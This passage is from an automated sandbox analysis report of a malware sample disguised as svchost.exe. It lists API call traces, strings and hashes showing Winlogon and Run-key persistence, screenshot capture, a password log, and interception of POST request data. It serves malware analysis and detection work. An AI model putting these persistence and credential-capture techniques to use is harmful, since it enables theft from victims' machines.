                                                                                                                                                                                                                  • Part of subcall function 02BC41B0: HeapValidate.KERNEL32(00000000), ref: 02BC41C1
                                                                                                                                                                                                                  • Part of subcall function 02BC41B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC41CE
                                                                                                                                                                                                                  • Part of subcall function 02BC41B0: RtlFreeHeap.NTDLL(00000000), ref: 02BC41D1
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(?), ref: 02BD4B71
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BD4B7B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Value$ProcessQuery$CloseExistsFileFlushFreeOpenPathValidate
                                                                                                                                                                                                                • String ID: C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                • API String ID: 579956326-2103896814
                                                                                                                                                                                                                • Opcode ID: 3651270a5cdb388e740aaadcc920aa9d146eab14830f736625838180e8695a9b
                                                                                                                                                                                                                • Instruction ID: fe181f4181763507234f3d90ad90dc1570fb569b6feec572c21d97e65abb377d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3651270a5cdb388e740aaadcc920aa9d146eab14830f736625838180e8695a9b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D512935600306FFEB208B649C98FFABBB9EF84744F1045C4FA46AB204E7719A19C790
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BB833C
                                                                                                                                                                                                                • GetThreadDesktop.USER32(00000000,?,?,02BB8212,00000000,00000000), ref: 02BB8343
                                                                                                                                                                                                                • SetThreadDesktop.USER32(00000000,?,?,02BB8212,00000000,00000000), ref: 02BB834F
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: GetTickCount.KERNEL32 ref: 02BBDA2D
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 02BBDA3E
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02BFF5A0), ref: 02BBDA6A
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BBDA83
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02BFF54C), ref: 02BBDAB0
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BBDAC3
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: CreateMutexA.KERNEL32(00000000,00000000,02BFF670), ref: 02BBDAE1
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BBDAFF
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 02BBDB20
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: SetNamedSecurityInfoA.ADVAPI32(02BFF670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BBDB3D
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: LocalFree.KERNEL32(00000000), ref: 02BBDB47
                                                                                                                                                                                                                  • Part of subcall function 02BBDC50: memset.MSVCRT ref: 02BBDC69
                                                                                                                                                                                                                  • Part of subcall function 02BBDC50: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 02BBDC82
                                                                                                                                                                                                                  • Part of subcall function 02BD9F50: malloc.MSVCRT ref: 02BD9F62
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 02BB83E7
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 02BB83F5
                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,fuck), ref: 02BB83FF
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: IsNetworkAlive.SENSAPI(02BB6E0D,00000000), ref: 02BC4F93
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: IsUserAnAdmin.SHELL32 ref: 02BC4FA1
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: DnsFlushResolverCache.DNSAPI ref: 02BC4FAB
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: memset.MSVCRT ref: 02BC4FC8
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,75570F10), ref: 02BC4FE7
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02BC5000
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5013
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: memset.MSVCRT ref: 02BC502C
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,75570F10), ref: 02BC5045
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02BC5058
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5065
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 02BB84A2
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02BB84B1
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02BB84E0
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB84EF
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BB84FD
                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000), ref: 02BB8506
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710,?,00000000), ref: 02BB854C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateFileObjectSecuritySingleWait$DescriptorHeapThreadmemset$AllocCheckConnectionDesktopInternetMappingMutexViewlstrcpyn$AdminAliveCacheConvertCountCurrentEventFlushFreeInfoLocalNamedNetworkReleaseResolverSaclSleepStringTickUserVersionlstrcpymalloc
                                                                                                                                                                                                                • String ID: P0Wu$SYSTEM!114127!0296CDC0$fuck
                                                                                                                                                                                                                • API String ID: 379441473-1759176567
                                                                                                                                                                                                                • Opcode ID: e53eb069a7a082009e30a4626ed9f4b359bad726e661ad0a455c023ffe9c75a1
                                                                                                                                                                                                                • Instruction ID: 9200360f6d42992ab1240cb64c26fc71e4e4743ce43689578d6a31305b38b746
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e53eb069a7a082009e30a4626ed9f4b359bad726e661ad0a455c023ffe9c75a1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6051B2759403419FD7619F68D888FF63BE9EF44354F094AE9E6584B2A2C7B0E814CF60
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d77e0), ref: 02BD23B7
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD23F9
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD2405
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD2409
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD241A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD2421
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD2452
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD2458
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD245C
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD246D
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD2474
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD24A2
                                                                                                                                                                                                                • Sleep.KERNEL32(00000FA0,?), ref: 02BD24B8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                • String ID: %s\%02d.bmp$617d77e0$scrs
                                                                                                                                                                                                                • API String ID: 224938940-1783372702
                                                                                                                                                                                                                • Opcode ID: b751ada994057206b71382bb6c06f76089aaf06b43ef00d91b3178f800991f4f
                                                                                                                                                                                                                • Instruction ID: 039b84eca5393c7aaa50577c57f38712708685db3ee5709faa95087eac17814f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b751ada994057206b71382bb6c06f76089aaf06b43ef00d91b3178f800991f4f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 163138319442595BDB60DB789C58BEABBE8EF55740F8884D4EEC5D3101EBB0E984CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D70E0), ref: 02BD1347
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD1389
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD1395
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD1399
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD13AA
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD13B1
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD13E2
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD13E8
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD13EC
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD13FD
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD1404
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD1432
                                                                                                                                                                                                                • Sleep.KERNEL32(00000FA0,?), ref: 02BD1448
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                • String ID: %s\%02d.bmp$617D70E0$scrs
                                                                                                                                                                                                                • API String ID: 224938940-3764988107
                                                                                                                                                                                                                • Opcode ID: 699e56b2bd9c3b97adb651014f87aa0debfda8946b40ca4795133e6d3663bf71
                                                                                                                                                                                                                • Instruction ID: 5ca896b11fe54b8ab98e8da4e254acc1cd6c460cbf46334fcef58177eadb7f82
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 699e56b2bd9c3b97adb651014f87aa0debfda8946b40ca4795133e6d3663bf71
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15312C319442195BDB60DB7D9C58BEABBE8EF55750F8884D4EA89D3100EB70E984CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752), ref: 02BD30A7
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD30E9
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD30F5
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD30F9
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD310A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD3111
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD3142
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD3148
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD314C
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD315D
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD3164
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD3192
                                                                                                                                                                                                                • Sleep.KERNEL32(00000FA0,?), ref: 02BD31A8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                • String ID: %s\%02d.bmp$617D7752$scrs
                                                                                                                                                                                                                • API String ID: 224938940-1259098354
                                                                                                                                                                                                                • Opcode ID: bff228b0edc0b80704684d1d1c6f87c44d78326aac28a2cf8badb507add1a0cc
                                                                                                                                                                                                                • Instruction ID: c7de85fa62b177ae635585667fc570b96f4bf437418619f4dfdcad7e4658cb19
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bff228b0edc0b80704684d1d1c6f87c44d78326aac28a2cf8badb507add1a0cc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F316931D402195BCB60CB789C58BEABBE8EF55740F8848D4EA85D3101EBB0E9C4CFA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BD31EC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD31FD
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD3211
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD321F
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD3080,00000000,00000000,00000000), ref: 02BD3234
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40), ref: 02BD3245
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BD324A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD325E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD326C
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752), ref: 02BD3277
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617D7752,RFK), ref: 02BD3291
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BD329A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                • String ID: 617D7752$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$RFK
                                                                                                                                                                                                                • API String ID: 505831200-465362393
                                                                                                                                                                                                                • Opcode ID: 0cab0555e026edf769a59949181a245f276d9f1881620c746b6627671b7cc057
                                                                                                                                                                                                                • Instruction ID: ff859a45a5d056cd9978ac2d0f3cee82835e8d13f95d120a51b98ccdcdc10604
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cab0555e026edf769a59949181a245f276d9f1881620c746b6627671b7cc057
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E111E230AC57027BF26067649C0AF9F77D8AF04B94F508684FB95B61C1ABE0A5008FB7
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000C10,75573050,755730D0,75573080), ref: 02BC50B7
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC50BA
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC50CE
                                                                                                                                                                                                                • inet_addr.WS2_32(?), ref: 02BC50F5
                                                                                                                                                                                                                • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BC5113
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC511D
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC5120
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC512D
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC5130
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 02BC5148
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC514F
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC515F
                                                                                                                                                                                                                • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BC5175
                                                                                                                                                                                                                • htons.WS2_32(00000000), ref: 02BC51A1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02BC51D1
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC51D4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02BC51E4
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC51E7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFreeTableValidatememset$htonsinet_addr
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1718479325-0
                                                                                                                                                                                                                • Opcode ID: 7fbbbcc82e655ac9a0f5af17e6bf3b9d1fa1f05d285992afc5f7f6fe9c144567
                                                                                                                                                                                                                • Instruction ID: 6e514c3344c575edd749ffb42520ed2c35e8343a5d71cc48deea61e86315ee8d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7fbbbcc82e655ac9a0f5af17e6bf3b9d1fa1f05d285992afc5f7f6fe9c144567
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9441C372A40304ABDB309F65DC4CF9E7B68EF44790FA58658FA45A7280DB71E580CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC5250
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC527C
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,0000001C,0000001C), ref: 02BC52A3
                                                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000005), ref: 02BC52D4
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BC52FD
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,Content-Length: ), ref: 02BC5315
                                                                                                                                                                                                                • StrToIntA.SHLWAPI(-00000010), ref: 02BC5323
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000004), ref: 02BC5355
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$Readmemcpystrstr
                                                                                                                                                                                                                • String ID: $Content-Length: $POST
                                                                                                                                                                                                                • API String ID: 2509092961-2076583852
                                                                                                                                                                                                                • Opcode ID: e7972b1d942e5c31f1ab25a471a792741f0cbfed0ee84b78b5b9b20dcb130159
                                                                                                                                                                                                                • Instruction ID: 2093565485bbcdd62a37dcd30fffe1f093fe504661ac3e54558abb05b9390df4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7972b1d942e5c31f1ab25a471a792741f0cbfed0ee84b78b5b9b20dcb130159
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C717F71D40309AFDB20CFA8D884BAEBBF5FB48704B58866DE606E7244D770A905CF90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BCE1D1
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02BCE209
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73AC), ref: 02BCE23D
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73AC), ref: 02BCE273
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(00000000), ref: 02BCE2B9
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCB980,00000000,00000000,00000000), ref: 02BCE338
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCE350
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCE361
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BCE387
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?), ref: 02BCE3C4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashHandle$CloseCreateExistsFileInformationThreadmemcpymemsetstrstr
                                                                                                                                                                                                                • String ID: 617D73AC$<L>$POST$bsi.dll$pass.log
                                                                                                                                                                                                                • API String ID: 4177962767-2777904747
                                                                                                                                                                                                                • Opcode ID: 54637b4078334f586aa29beb8dae7888868d86550de0a4534d0e707bcc3c91da
                                                                                                                                                                                                                • Instruction ID: 46df604d2f633d9e092139db962f8a8c0f9caf5889cf91ce54daf9e584c0ba98
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54637b4078334f586aa29beb8dae7888868d86550de0a4534d0e707bcc3c91da
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45512E31D40309DBD7229F34E848BDA7BA5FF88704F2586D9EA4597280DBB0EA54CBD0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0CF94), ref: 02BD3367
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD33A9
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD33B5
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD33B9
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD33CA
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD33D1
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD3402
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD3408
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD340C
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD341D
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD3424
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD3452
                                                                                                                                                                                                                • Sleep.KERNEL32(00000FA0,?), ref: 02BD3468
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                                • API String ID: 224938940-1670482240
                                                                                                                                                                                                                • Opcode ID: 8e14f35cd3d53e9fd4ee45f4995e1f6959d0c3f881704dc7296454a9a5980491
                                                                                                                                                                                                                • Instruction ID: b5a1ed7bc9656a71c23918afc14a0d9986feb95407b449470bb09fea83ea2b8d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e14f35cd3d53e9fd4ee45f4995e1f6959d0c3f881704dc7296454a9a5980491
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E314C319442185BCB60DB789C58BEABBE8EF55750F8884D4EAC5D3101EFB0E984CFA1
